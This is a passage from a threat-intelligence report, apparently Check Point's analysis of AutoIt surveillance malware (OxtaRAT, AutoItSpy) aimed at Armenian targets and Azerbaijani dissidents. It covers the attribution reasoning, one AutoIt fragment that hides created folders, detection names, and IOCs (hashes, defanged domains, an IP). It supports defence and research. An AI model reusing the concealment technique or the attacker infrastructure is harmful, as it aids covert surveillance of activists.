revealed, we\r\nbelieve that there might have been other targets of this campaign in Armenia as well.\r\nhttps://research.checkpoint.com/2023/operation-silent-watch-desktop-surveillance-in-azerbaijan-and-armenia/\r\nPage 10 of 12\n\nFigure 7 – Facebook post by Lapshin (automatic translation).\r\nAll of the samples from this campaign and earlier ones are related to Azerbaijani government interests; they either targeted\r\nAzerbaijani political and human rights activists or, if the targets were not disclosed publicly, reference tensions between\r\nAzerbaijan and Armenia over Artsakh/Nagorno-Karabakh. Meta, in their Adversarial Threat Report Q1-2021, attributed the\r\nprevious campaigns reported by Qurium to the Azeri Ministry of Internal Affairs. However, no technical analyses were\r\nprovided.\r\nIn 2017, Amnesty International reported a campaign that started as early as November 2015 and continued through 2017.\r\nThis campaign used Autoit malware called AutoItSpy against Azerbaijani dissidents, and was later connected by Qurium to\r\nother “denial-of-service attacks, intrusion attempts, spear-phishing campaigns and electronic media monitoring from Internet\r\ninfrastructure associated with the Government of Azerbaijan.” The AutoItSpy malware used at the time had the ability to\r\nlog the keystrokes and collect screenshots, exfiltrating both of them over SMTP protocol.\r\nEven though we couldn’t find any infrastructure overlap with our campaign (considering a gap of a few years and public\r\nexposure of previous attacks), there is a significant overlap in major TTPs:\r\nThe use of AutoIT malware.\r\nThe use of files with SCR extensions bearing document-related icons (PDF, Word).\r\nA focus on surveillance technology (keylogging, screen capture, data exfiltration).\r\nSimilar consistent targeting.\r\nAlthough it is tricky to compare the code of tools with different functionality (keylogger compared to a full-blown\r\nsurveillance tool), there are a few high-level overlaps in the coding style of these tools:\r\nThe samples from the AutoItSpy campaign are obfuscated with similar techniques as the OxtaRAT samples from\r\n2022.\r\nTemporary file names with collected information of AutoItSpy and OxtraRAT both mimic the Windows thumbnail\r\ncache:\r\nFigure 8 – “Thumb” in file names of AutoItSpy (top) and OxtraRAT (bottom).\r\nAdditional details such as extensively using %random% %random% %random% in all the batch scripts, immediately\r\nsetting file attributes with FileSetAttrib($dir, \"+SH\") for all the newly created folders, excessive usage of the\r\nRandom function, etc.\r\nBased on these similarities in TTPs, code and targeting, we can conclude with medium confidence that both cases involve\r\nthe same threat actors. We can also speculate that the missing “implant” in OxtaRAT that we were unable to access might be\r\na keylogger; not only is it an important functionality missing from OxtaRAT’s multi-functional surveillance arsenal, but also\r\nthe actors might take extra measures to avoid revealing it to anyone except the targets, possibly to avoid attribution based on\r\nalready uncovered information.\r\nhttps://research.checkpoint.com/2023/operation-silent-watch-desktop-surveillance-in-azerbaijan-and-armenia/\r\nPage 11 of 12\n\nConclusion\r\nIn this article, we describe the latest attack and the evolution of the tools in the campaigns against Armenian targets, as well\r\nas Azerbaijani activists and dissidents. All the details indicate that the underlying threat actors have been maintaining the\r\ndevelopment of Auto-IT based malware for the last seven years, and are using it in surveillance campaigns whose targets are\r\nconsistent with Azerbaijani interests.\r\nCheck Point’s Threat Prevention Engines provides comprehensive coverage of attack tactics, file-types, and operating\r\nsystems and protects against attacks such as described in this research. ThreatCloud is Check Point’s rich cyber defense\r\ndatabase. Its threat intelligence powers Check Point’s zero-day protection solutions.\r\nCheck Point products provide the following coverage against this threat:\r\nAnti-Bot: Trojan.WIN32.OxtaRAT.A, Trojan.WIN32.OxtaRAT.B\r\nThreat Emulation: Trojan.WIN.OxtaRAT.A\r\nIOCs\r\n6ac414fad3d61ad5b23c2bcdd8ee797f\r\nddac9a1189e4b9528d411e07d0e98895\r\n0360185bc6371ae42ca0dffe0a21455d\r\nddac9a1189e4b9528d411e07d0e98895\r\n1c94f1c6241cb598da5da7150a0dc541\r\ndf9673032789847a367df9923bbd44d2\r\na1a39e458977aa512b7ff2ba1995b18d\r\ncf225029cade918d92b4b4e2b789b7a5\r\n86b5245112436e8a5eabf92fab01ffba\r\nedupoliceam[.]info\r\nfilesindrive[.]info\r\nmediacloud[.]space\r\navvpassport[.]info\r\nfilecloudservices[.]xyz\r\n38.242.197[.]156\r\nSource: https://research.checkpoint.com/2023/operation-silent-watch-desktop-surveillance-in-azerbaijan-and-armenia/\r\nhttps://research.checkpoint.com/2023/operation-silent-watch-desktop-surveillance-in-azerbaijan-and-armenia/\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2023/operation-silent-watch-desktop-surveillance-in-azerbaijan-and-armenia/"
	],
	"report_names": [
		"operation-silent-watch-desktop-surveillance-in-azerbaijan-and-armenia"
	],
	"threat_actors": [],
	"ts_created_at": 1775434427,
	"ts_updated_at": 1775826712,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b193f073c01e5420165d7f91a89e2de32ae2e2a8.pdf",
		"text": "https://archive.orkl.eu/b193f073c01e5420165d7f91a89e2de32ae2e2a8.txt",
		"img": "https://archive.orkl.eu/b193f073c01e5420165d7f91a89e2de32ae2e2a8.jpg"
	}
}